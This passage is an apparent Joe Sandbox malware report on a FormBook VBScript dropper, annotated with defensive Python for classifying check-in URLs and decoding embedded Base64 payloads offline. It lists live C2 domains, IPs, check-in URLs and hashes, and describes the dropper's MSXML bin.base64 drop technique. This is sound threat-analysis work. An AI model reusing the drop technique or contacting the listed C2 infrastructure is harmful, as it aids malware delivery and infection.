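if __name__ == "__main__":
    for url in REPORT_URLS + BENIGN_URLS:
        print(("CHECKIN " if is_checkin(url) else "-       ") + url)
    print(pivot_by_path(REPORT_URLS + BENIGN_URLS))
    print(shared_params(REPORT_URLS))
```

Run against the report's URLs, the four full check-ins match, the bare www.happygreenfarm.com/de94/ entry does not (no query) but is still grouped under de94 by the path pivot, and the only parameter constant across all check-ins is iH=L48pdJnx. The query is split by hand rather than with parse_qsl because the long parameter uses the standard Base64 alphabet and parse_qsl would silently rewrite its '+' characters.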
Contacted public IPs
IP | Domain | Country | ASN | ASN Name | Malicious
195.35.41.249 | especialistaleitura.online | Germany | 8359 | MTSRU | true
103.169.142.0 | www.gyosei-arimura.com | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe (name truncated in the source) | true
198.54.117.242 | www.tateshades.xyz | United States | 22612 | NAMECHEAP-NETUS | true
104.21.29.136 | www.rendamaisbr.com | United States | 13335 | CLOUDFLARENETUS | false
79.133.41.250 | ashleymorgan.live | Germany | 203833 | AT-FIRSTCOLOAustriaAT | true
Analysis information
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1482976
Start date and time: 2024-07-26 13:02:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: TNS71092E68UI0.vbe
Detection: MAL
Classification: mal100.troj.evad.winVBE@10/2@12/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 121
• Number of non-executed functions: 341
Cookbook Comments:
• Found application associated with file extension: .vbe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size exceeded maximum capacity and may be missing disassembly code
• Report size getting too big: too many NtEnumerateKey calls found
• Report size getting too big: too many NtOpenKey calls found
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtProtectVirtualMemory calls found
• Report size getting too big: too many NtQueryValueKey calls found

The truncation notes matter when reading the rest of this report: behavior and disassembly were cut for size and time, so the absence of a behavior here is not evidence that the sample lacks it.
Analysis timeline
Time | Type | Description
07:03:10 | API Interceptor | 1x Sleep call for process: HHhHh.exe modified
07:03:20 | API Interceptor | 7093104x Sleep call for process: explorer.exe modified
07:03:53 | API Interceptor | 6766871x Sleep call for process: wscript.exe modified

"Modified" means the sandbox shortened the sleep. Roughly seven million Sleep calls in the injected explorer.exe and another 6.8 million in the second wscript.exe within a twelve-minute run show the injected code spinning in a tight Sleep loop between actions; on a real host those delays run at full length, so the check-in cadence seen in the network section is compressed relative to what a network sensor would observe in production.
Context: IPs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
103.169.142.0 | PURCHASING ORDER.exe | malicious | FormBook, PureLog Stealer | www.tatetits.fun/hy08/?q4k=ZU/tNHZcxuQwuUysFzqTJgPjiqik5ONlvOVKJJQ3Lwuc3sNdWpL7gNnjk4oVQI6QdUmYC0CSew==&3f2pj=9rDXMfLppP84JvX
103.169.142.0 | Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe | malicious | FormBook | www.paucanyes.com/pz12/?Ft6LPF=wmB39g7fMVvhAuIXrcacNlSYByOKhXrL5caurGICgekgrDmbedkAGJpMCJINZ+FV4qAD&Ev2=OjrLPv0Hh4WLu
103.169.142.0 | LrhyzIl40E4GDdy.exe | malicious | FormBook | www.pedandmore.com/cr12/?BTOpnf=iIPpOUXNyO34lcpLdk5huh2xxw1lHvA4p4NfyRoKXWr7GJ/HmAQJ3oSSYiZx4RWCGij5I5N7HQ==&GdPLV=vBZHrVzHLZo0h4
103.169.142.0 | FX6nkep9GCEHbmb.exe | malicious | FormBook | www.pedandmore.com/cr12/?8pY=c2MXfj9hZ4EphnoP&ZPx4zB2H=iIPpOUXNyO34lcpLdk5huh2xxw1lHvA4p4NfyRoKXWr7GJ/HmAQJ3oSSYh1X/Qq6LDCi
103.169.142.0 | dVebcwR6p0.exe | malicious | FormBook | www.piedrajuansebastian.net/fs83/?Txl=O0GPaRWPLnPXX6&NVoluR=s49Ut+wkX4QXz9GJZDxNW7pfCDFSyXZVyJkpGBOG3y/jGvv59DF1wmbR+R4pG2EI6BCdkePZNA==
103.169.142.0 | #U043d#U043e#U0432#U0430_#U043f#U043e#U0440#U044a#U0447#U043a#U0430_pdf.exe (escaped Cyrillic; decodes to нова_поръчка_pdf.exe) | malicious | FormBook | www.nicklawsoncreative.com/m0d5/?4hl=-ZgPd27PJrpD&uZCd=dGhLoH5vjBvSJznqGXUszKfwiWn6UPxWPatQvtz8yx4Tr5Zxdjnw04caI7oX+qJSIHRo
103.169.142.0 | rINQUIRYFORQUOTATION.exe | malicious | FormBook | www.deiaamore.com/a0e6/?1bkDOF=IX0xa&BPWX-v5=8mbVPnG+J9r+9PiSrFOTB0biFER4eJiyZWSSX7iNA85IcvPXL8mibUw7gnCGqicgoGXX
103.169.142.0 | hi38VYWujz.exe | malicious | FormBook, GuLoader | www.embhajeflexiveis.com/be53/?oT5=aYnY9ags8h7dJGIqJu8WrtwFY6Xckqfyut2fSd51fLqlVrU9YICaztEIWdsYD/JWvyc3&v0Dd=aPFdKLwPWjPXZR-p
103.169.142.0 | http://sunprojects.club | malicious | HTMLPhisher | sunprojects.club/
198.54.117.242 | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | www.usebanq.com/azio/
198.54.117.242 | hdBLUdo056.exe | malicious | FormBook | www.usebanq.com/8lx9/
198.54.117.242 | fiY5fTkFKk.rtf | malicious | FormBook | www.usebanq.com/8lx9/
198.54.117.242 | tEBdYCAxQC.rtf | malicious | FormBook | www.usebanq.com/8lx9/
198.54.117.242 | PIG860624BF1GE1532.xml.exe | malicious | FormBook | www.cbsnews23.store/q696/
198.54.117.242 | 12nTpM7hB1.exe | malicious | FormBook, PureLog Stealer | www.cbsnews23.store/q696/
198.54.117.242 | OSL332C-HBLx#U180es#U180el#U180ex#U180e..exe (#U180e is an escaped U+180E, an invisible format character) | malicious | FormBook | www.cbsnews23.store/q696/
198.54.117.242 | prnportccy.vbs | malicious | FormBook | www.rertwre.info/2whg/?o0Zx=XBfcH9YKQNJ7gYYElMI2jgZ671AqBS/+k/0z7hNmt0RBbbFlxuyTDu2wja3ybvTaZji8CR/rwA2iPew+hyoz00W9R3v/3FKbkwDVe2LckHr98S3hZ92xNv4=&tZmp=CfGpi2Bp2bbH12U
198.54.117.242 | m2 Cotizaci#U00f3n-1634.pdf.exe (Cotización) | malicious | FormBook | www.cbsnews23.store/q696/
198.54.117.242 | order enquiry PDF.vbs | malicious | FormBook | www.usebanq.com/uf1r/?sRy=BLaLYB&UDwd=ZjtyFPwJHB2+fbXQFBKI637ksOjg2Mch+iRGcCcbVumerEs2DPVaf+8kqQRK+lSc75dhD6fMTI6KWzj8vbB0SjTMUINgNtuWilsH91QlgNou83Xkng==

The IP context is the strongest correlation in this section: both addresses have served FormBook check-ins for many prior samples, with the same URL shape (a short path segment such as /hy08/ or /q696/ followed by two parameters) across unrelated domains. Decoy lure filenames in the prior samples (invoices, purchase orders, quotations, a Cyrillic "new order" PDF) match the sample's own delivery theme.
Context: Domains
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ext-sq.squarespace.com | LisectAVT_2403002C_3.exe | malicious | FormBook | 198.185.159.144
ext-sq.squarespace.com | http://hwylovermk.shop/product_details/5509027.html | malicious | Unknown | 198.185.159.144
ext-sq.squarespace.com | CSCEC Middle East (L.L.C).exe | malicious | FormBook | 198.185.159.144
ext-sq.squarespace.com | QNB SWIFT PAYMENT INTER-BANK SETTLEMENT FT22037358.exe | malicious | FormBook | 198.185.159.144
ext-sq.squarespace.com | xU0wdBC6XWRZ6UY.exe | malicious | FormBook, PureLog Stealer | 198.185.159.144
ext-sq.squarespace.com | FSW510972H6P0.exe | malicious | FormBook, DBatLoader | 198.185.159.144
ext-sq.squarespace.com | http://www.crowdstrike-helpdesk.com/ | malicious | Unknown | 198.185.159.144
ext-sq.squarespace.com | DHL_497104778908.exe | malicious | FormBook | 198.185.159.144
ext-sq.squarespace.com | Steel pipes material data sheets Bill of Quantity Valves chemicals KM C654e21011710050.exe | malicious | FormBook, PureLog Stealer | 198.185.159.144
ext-sq.squarespace.com | yEz94BK14pkJoFb.exe | malicious | FormBook, PureLog Stealer | 198.185.159.144

ext-sq.squarespace.com is shared Squarespace hosting that many FormBook configurations list as a decoy; its recurrence across prior samples reflects that, not attacker control of the host, and it is marked non-malicious in the domain table above.
Context: ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | file.exe | malicious | SystemBC | 103.164.245.233
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | file.exe | malicious | SystemBC | 103.170.105.14
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | New Order.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 103.163.138.29
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | LisectAVT_2403002B_137.dll | malicious | Trickbot | 134.150.60.75
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | LisectAVT_2403002B_164.exe | malicious | UACMe | 103.165.81.207
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | Quotation .exe | malicious | Remcos, DBatLoader | 103.186.116.62
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | Request Quotation.exe | malicious | Remcos, DBatLoader | 103.186.117.150
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | https://sidbm.net/officialweb/?russell.sinco@corespecialty.com | malicious | HTMLPhisher | 103.177.95.90
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | Request for quotation.exe | malicious | Remcos, DBatLoader | 103.186.117.150
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | OCcyyxs6dW.elf | malicious | Unknown | 138.44.174.224
MTSRU | 7Y18r(223).exe | malicious | Bdaejec | 62.118.122.137
MTSRU | https://assets-usa.mkt.dynamics.com/95689b1f-9545-ef11-bfdf-00224825570b/digitalassets/standaloneforms/40bb8d8b-d049-ef11-a317-6045bdd83a8b | malicious | Outlook Phishing, HTMLPhisher | 195.35.33.215
MTSRU | Installer Setup 9.7.0.exe | malicious | Unknown | 195.35.49.154
MTSRU | SecuriteInfo.com.FileRepMalware.25505.20211.exe | malicious | Unknown | 195.35.33.201
MTSRU | Qa5qvgWyUn.elf | malicious | Mirai | 91.77.166.9
MTSRU | http://pub-a8ca61c8f7dc4c519488087e0ecec227.r2.dev/index.html | malicious | Unknown | 195.35.33.215
MTSRU | http://pub-87e95b6c746d4f758cf64246fecf1595.r2.dev/index.html | malicious | Unknown | 195.35.33.215
MTSRU | jew.m68k.elf | malicious | Unknown | 89.209.77.15
MTSRU | qgtfQPgL23.elf | malicious | Unknown | 91.76.115.62
MTSRU | https://isragohar.github.io/Fb-Clone- | malicious | Unknown | 195.35.10.26
NAMECHEAP-NETUS | file.exe | malicious | SystemBC | 198.54.120.214
NAMECHEAP-NETUS | LisectAVT_2403002A_333.exe | malicious | Unknown | 198.54.125.89
NAMECHEAP-NETUS | LisectAVT_2403002A_333.exe | malicious | Unknown | 198.54.125.89
NAMECHEAP-NETUS | LisectAVT_2403002A_87.exe | malicious | FormBook | 162.0.236.122
NAMECHEAP-NETUS | LisectAVT_2403002A_97.exe | malicious | DarkVision Rat | 198.54.126.102
NAMECHEAP-NETUS | Quotation.exe | malicious | FormBook | 68.65.122.150
NAMECHEAP-NETUS | LisectAVT_2403002B_309.exe | malicious | Bdaejec, FormBook | 162.0.225.191
NAMECHEAP-NETUS | LisectAVT_2403002B_412.exe | malicious | FormBook | 162.0.238.43
NAMECHEAP-NETUS | LisectAVT_2403002C_119.exe | malicious | Bdaejec, Sodinokibi | 198.54.121.233
NAMECHEAP-NETUS | LisectAVT_2403002C_3.exe | malicious | FormBook | 162.0.236.122
CLOUDFLARENETUS | IRqsWvBBMc.exe | malicious | Amadey, Vidar | 104.21.72.79
CLOUDFLARENETUS | SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe | malicious | FormBook | 172.67.134.182
CLOUDFLARENETUS | https://rtntrack.rediff.com/click?url=___https://www.firstpost.com/health/covid-19-puts-kidney-patients-at-high-risk-as-poor-immunity-ill-equipped-dialysis-centres-exposes-patients-to-infection-8627161.html___&service=instasearch&clientip=66.249.79.152&pos=readfullarticle&Ruw=&Rl=&q=&destinationurl=https://My.ha51000.com/.de/c2FsbHkuYmVldHlAcXVpbHRlci5jb20= | malicious | Phisher | 188.114.96.3
CLOUDFLARENETUS | RFQ#51281AOLAI.xls | malicious | FormBook, PureLog Stealer | 188.114.96.3
CLOUDFLARENETUS | https://intralinks.us.com/kI1A4RAsty2APhQ3Ea4DCmQ3E4DCI1Acalz01coTxm | malicious | HTMLPhisher | 172.67.159.233
CLOUDFLARENETUS | https://forms.office.com/r/WH4W8hyyNA | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | malicious | Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | file.exe | malicious | Unknown | 104.21.72.79
CLOUDFLARENETUS | file.exe | malicious | Unknown | 104.21.72.79
CLOUDFLARENETUS | RFQ#51281AOLAI.xls | malicious | FormBook, PureLog Stealer | 188.114.96.3

Context: JA3 Fingerprints
No context

Context: Dropped Files
No context

ASN-level context is weak evidence on its own. Cloudflare, Namecheap and MTS carry large amounts of unrelated traffic, and the prior samples listed for them span Mirai, Trickbot, Sodinokibi and phishing kits; only the NAMECHEAP-NETUS rows that are FormBook hits, and the IP-level matches in the first context table, support attributing this sample's infrastructure to an ongoing FormBook operation.
Dropped file 1
Process: C:\Users\user\AppData\Local\Temp\HHhHh.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

This file is not payload: the 1,"fusion","GAC" / 2,"<assembly>" / 3,"<assembly>","<native image path>" line format is the CLR assembly usage log that the .NET Framework runtime writes the first time a managed executable runs (under %LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\, named after the executable). It is useful forensically as evidence that HHhHh.exe executed as a 32-bit .NET 4 application and bound System.Windows.Forms, System.Drawing, System.Core, System.Configuration and System.Xml, which agrees with the PE32 .NET file type of the second dropped file below.

Dropped file 2
Process: C:\Windows\System32\wscript.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 574464
Entropy (8bit): 7.9719357617793225
Encrypted: false
SSDEEP: 12288:PUHa23esgAwon1bfxnltD+u5IgHnWT8GqIvZdww/kV+s00XDsGW4g:Oa2usg9gFZn/D+yImfIvZdw0kV+B0XH
MD5: 62FA567CBB7227AEB7755B679D780725
SHA1: 0280D019165F8DF6B76CFA87047C76D9003AB193
SHA-256: 7B67DC6AD75A054A5BAAFF1CB3E61C2436823DE4FD80B6E73CD9CBBB850F6D81
SHA-512: CEB8059393DBF6B2E55FE324FC957A319223508162CB278FA3A48A849B2C77D2AAB285B91C3A122C56C72D2819CE24A18B02BC2BF83963634F083929E74B1B01
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.f..............0.............N.... ........@.. ....................... ............@.....................................O.......................................T............................................ ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........B...=..........\...(?..........................................^..}.....(.......(.....*.0../........(...........s....o...........s.... ....o.....*..0............r...po......,..(...+...+....,....o.....+S.o............+7............(........( ..........,.........&........X.......i2...+..*......C.#f........{....*"..}....*....0..G.........(!.....,$........s".........%...P....(#...&+....-..+..($.....(%.....*..0..+.........,..{.......+....,...{....o&.......('....*..0......

The entropy of 7.97 over 574 KB, together with the "Encrypted: false" verdict, is the signature of a packed or encrypted .NET loader: the PE headers and section table are in the clear (which is why the file is not classified as encrypted) while almost everything else is a high-entropy blob that the managed stub decrypts at run time. That matches the ".NET source code contains potential unpacker" signature in the overview and explains why the unpacked FormBook payload only appears as injected memory, not as a file on disk.
Initial sample
File type: ASCII text, with very long lines (65242), with CRLF line terminators
Entropy (8bit): 5.979589269470885
TrID:
• Visual Basic Script (13500/0) 100.00%
File name: TNS71092E68UI0.vbe
File size: 804'487 bytes
MD5: 83ef588dc92a85ef93d055290393a07d
SHA1: c7fa54bb9f8d5467137197b8e344b95d2e1f4430
SHA256: 02500b9058612028c5667bfd9302d81184689fcb88eb5500902d39baec246fa0
SHA512: eb1adad95a1269dd49e202e966b67a8d3867055c1462687596fa47dd133929544a295e2e3b04f8bfe3c87690d241f780f4a1ad75718e462b468007e3e8dd0827
SSDEEP: 12288:WEPXAjdRFEYFexVioNs4tkt4pNVZUAZTklPuAGPm1LEKIV8rrq9bbeQnhG4Shmo9:nPXApEY0ioCUpNV+unrKs869FE5hmo9
TLSH: F1051263F3431BD91A479EED8A4527F296D0ADEF1816C6F2DF8A061310F45E24D13E2A
File Content Preview: ' Constants for XML and Base64 processing..Const XML_TYPE = "MSXML2.DOMDocument"..Const ELEMENT_TYPE = "text"..Const DATA_TYPE = "bin.base64"....' Declare variables..Dim base64EncodedString, tempFolderPath, executablePath....' Initialize the Base64 encode
Icon Hash: 68d69b8f86ab9a86

Two things in the static data are worth recording. First, despite the .vbe extension (the Windows Script Encoder format), the file type, TrID result and preview all show plain, readable VBScript; Windows Script Host runs either, so the extension only buys the attacker the file association and a less familiar icon. Second, the preview names the decoding technique: a Base64 string (the 65242-character lines in an 804 KB script are that blob) is pushed through an MSXML2.DOMDocument element whose dataType is set to bin.base64, which makes the COM object do the decoding, and the tempFolderPath and executablePath variables point at the same %TEMP%\HHhHh.exe drop that the behavior graph records. This is the activity behind the "Windows Scripting host queries suspicious COM object (likely to drop second stage)" signature.
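The decoding step described above can be reproduced offline, so the second stage is hashed without ever running wscript.exe. The following is an added example for this page, not code from the Joe Sandbox report or from the sample: it collects the string literals a VBScript dropper assigns to a variable (including `& _` continuations and `v = v & "..."` accumulation), Base64-decodes any long candidate and flags PE images by their MZ magic. The dropper source and payload it runs on are constructed stand-ins modelled on the preview shown in the report, not the real script or HHhHh.exe.

```python
"""Recover Base64-embedded payloads from a VBScript dropper offline.

Added example for this page; it is not code from the Joe Sandbox report or from
the sample. The report's content preview shows the script declaring
MSXML2.DOMDocument, a "text" element and the "bin.base64" data type, together
with a base64EncodedString variable: the usual VBScript idiom for decoding an
embedded binary before writing it to %TEMP%. The functions below reproduce the
decoding so the second stage can be hashed without executing wscript.exe. The
dropper source and payload used here are constructed stand-ins.
"""
import base64
import hashlib
import re

# `v = "a" & "b"`, `v = v & "c"`, `Const v = "x"`; group 2 is the self-reference.
ASSIGN_RE = re.compile(r'^\s*(?:Const\s+|Dim\s+)?(\w+)\s*=\s*(?:(\w+)\s*&\s*)?(.*)$', re.I)
STRING_RE = re.compile(r'"([^"\r\n]*)"')
B64_RE = re.compile(r'^[A-Za-z0-9+/]+={0,2}$')


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def join_continuations(src):
    """Collapse VBScript `& _` line continuations into single logical lines."""
    return re.sub(r'&\s*_\s*\r?\n\s*', '& ', src)


def collect_string_vars(src):
    """Map lower-cased variable name -> concatenation of the string literals
    assigned to it, following the `v = v & "..."` accumulation pattern."""
    acc = {}
    for line in join_continuations(src).splitlines():
        if not line.strip() or line.lstrip().startswith("'"):
            continue                      # blank or comment-only line
        m = ASSIGN_RE.match(line)
        if not m:
            continue                      # not an assignment we track
        name, self_ref, rhs = m.group(1).lower(), m.group(2), m.group(3)
        chunk = "".join(STRING_RE.findall(rhs))
        if not chunk:
            continue
        if self_ref and self_ref.lower() == name:
            acc[name] = acc.get(name, "") + chunk
        else:
            acc[name] = chunk
    return acc


def extract_payloads(src, min_len=64):
    """Decode every long Base64-looking string variable and flag PE images."""
    found = []
    for name, value in collect_string_vars(src).items():
        compact = re.sub(r'\s+', '', value)
        if len(compact) < min_len or not B64_RE.match(compact):
            continue
        padded = compact + "=" * (-len(compact) % 4)
        try:
            data = base64.b64decode(padded, validate=True)
        except ValueError:                # binascii.Error is a ValueError
            continue
        found.append({
            "variable": name,
            "size": len(data),
            "is_pe": data[:2] == b"MZ",   # DOS header magic of a PE file
            "sha256": sha256_hex(data),
        })
    return found


# Constructed payload: a fake DOS/PE header plus filler, NOT the real HHhHh.exe.
FAKE_PE = (b"MZ\x90\x00" + b"\x00" * 56
           + b"This program cannot be run in DOS mode.\r\n" + bytes(range(256)))


def constructed_dropper(payload):
    """Build a VBScript dropper in the shape the report's preview shows."""
    b64 = base64.b64encode(payload).decode()
    chunks = [b64[i:i + 60] for i in range(0, len(b64), 60)]
    lines = [
        "' Constants for XML and Base64 processing",
        'Const XML_TYPE = "MSXML2.DOMDocument"',
        'Const ELEMENT_TYPE = "text"',
        'Const DATA_TYPE = "bin.base64"',
        "Dim base64EncodedString, tempFolderPath, executablePath",
        'base64EncodedString = "%s" & _' % chunks[0],
        '    "%s"' % chunks[1],
    ]
    lines += ['base64EncodedString = base64EncodedString & "%s"' % c for c in chunks[2:]]
    lines += [
        "Set xmlDoc = CreateObject(XML_TYPE)",
        "Set node = xmlDoc.createElement(ELEMENT_TYPE)",
        "node.dataType = DATA_TYPE",
        "node.text = base64EncodedString",
        "' node.nodeTypedValue now holds the decoded bytes written to disk",
    ]
    return "\r\n".join(lines)


SAMPLE_VBS = constructed_dropper(FAKE_PE)

if __name__ == "__main__":
    for hit in extract_payloads(SAMPLE_VBS):
        print(hit)
```

On the constructed script the only variable long enough to qualify is base64EncodedString, and its decoded bytes start with MZ. Against a real dropper the same routine gives the SHA-256 of the embedded stage for comparison with the dropped-file hash in the report; if the script splits the blob into several differently named variables or applies a substitution before decoding, those steps have to be mirrored first, which is why the collector keeps the per-variable map instead of a single joined string.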
Suricata IDS alerts
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-26T13:07:33.006686+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.5 | 103.224.182.210
2024-07-26T13:06:31.117213+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 49723 | 80 | 192.168.2.5 | 34.149.86.124
2024-07-26T13:03:59.789400+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49717 | 52.165.165.26 | 192.168.2.5
2024-07-26T13:04:29.975873+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 49719 | 80 | 192.168.2.5 | 79.133.41.250
2024-07-26T13:03:47.731358+0200 | TCP | 2527003 | ET Threatview.io High Confidence Cobalt Strike C2 IP group 4 | 80 | 49716 | 198.54.117.242 | 192.168.2.5
2024-07-26T13:03:48.249330+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 49716 | 80 | 192.168.2.5 | 198.54.117.242
2024-07-26T13:02:59.626273+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.5 | 103.169.142.0
2024-07-26T13:03:21.583205+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49709 | 52.165.165.26 | 192.168.2.5
2024-07-26T13:06:10.664892+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 49722 | 80 | 192.168.2.5 | 67.223.118.63
2024-07-26T13:05:50.281197+0200 | TCP | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 49721 | 80 | 192.168.2.5 | 195.35.41.249

How to read these alerts. The seven SID 2031453 hits are the substantive finding: one FormBook check-in from the analysis host (192.168.2.5) over plain HTTP on port 80 to each contacted C2 candidate, 103.224.182.210, 34.149.86.124, 79.133.41.250, 198.54.117.242, 103.169.142.0, 67.223.118.63 and 195.35.41.249, which correspond to the domains in the tables above. The two SID 2022930 hits are not attributable to the sample: they fire on the server side of outbound TLS connections (source port 443, destination ports 49709 and 49717 on the analysis host) from 52.165.165.26, an address in a Microsoft-registered range, and the Symantec CAB-parsing content match is a known source of false positives on legitimate CAB downloads such as Windows certificate trust lists; treat it as noise unless a separate exploit artefact appears. SID 2527003 is an IP-reputation rule, not a content match: its timestamp, 13:03:47.731358, is identical to the first server-to-client packet of the 49716 flow in the network timeline below, i.e. it fired on the SYN/ACK from 198.54.117.242 before any HTTP data, and the traffic it labels is the FormBook check-in that SID 2031453 matched half a second later. Shared Namecheap hosting explains the address appearing on a Cobalt Strike list; carry FormBook, not Cobalt Strike, into the incident record.
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 26, 2024 13:03:47.440092087 CEST | 192.168.2.5 | 1.1.1.1 | 0x6d4d | Standard query (0) | www.tateshades.xyz | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:04:07.986484051 CEST | 192.168.2.5 | 1.1.1.1 | 0xaf9a | Standard query (0) | www.gyosei-arimura.com | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:04:27.964199066 CEST | 192.168.2.5 | 1.1.1.1 | 0x16bd | Standard query (0) | www.ashleymorgan.live | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:04:28.954454899 CEST | 192.168.2.5 | 1.1.1.1 | 0x16bd | Standard query (0) | www.ashleymorgan.live | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:05:08.768634081 CEST | 192.168.2.5 | 1.1.1.1 | 0xfb71 | Standard query (0) | www.gv031.net | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:05:29.221997023 CEST | 192.168.2.5 | 1.1.1.1 | 0x6b26 | Standard query (0) | www.rendamaisbr.com | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:05:49.596071005 CEST | 192.168.2.5 | 1.1.1.1 | 0x5f92 | Standard query (0) | www.especialistaleitura.online | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:06:10.116986990 CEST | 192.168.2.5 | 1.1.1.1 | 0x87de | Standard query (0) | www.rtproketslotcsn.art | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:06:30.550052881 CEST | 192.168.2.5 | 1.1.1.1 | 0x8497 | Standard query (0) | www.exploringtheoutdoors.net | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:06:50.970854998 CEST | 192.168.2.5 | 1.1.1.1 | 0xc4c3 | Standard query (0) | www.invigoratewell.com | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:07:11.898164034 CEST | 192.168.2.5 | 1.1.1.1 | 0x611e | Standard query (0) | www.legalix.xyz | A (IP address) | IN (0x0001) | false
Jul 26, 2024 13:07:32.158236027 CEST | 192.168.2.5 | 1.1.1.1 | 0xbb21 | Standard query (0) | www.21stcut.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
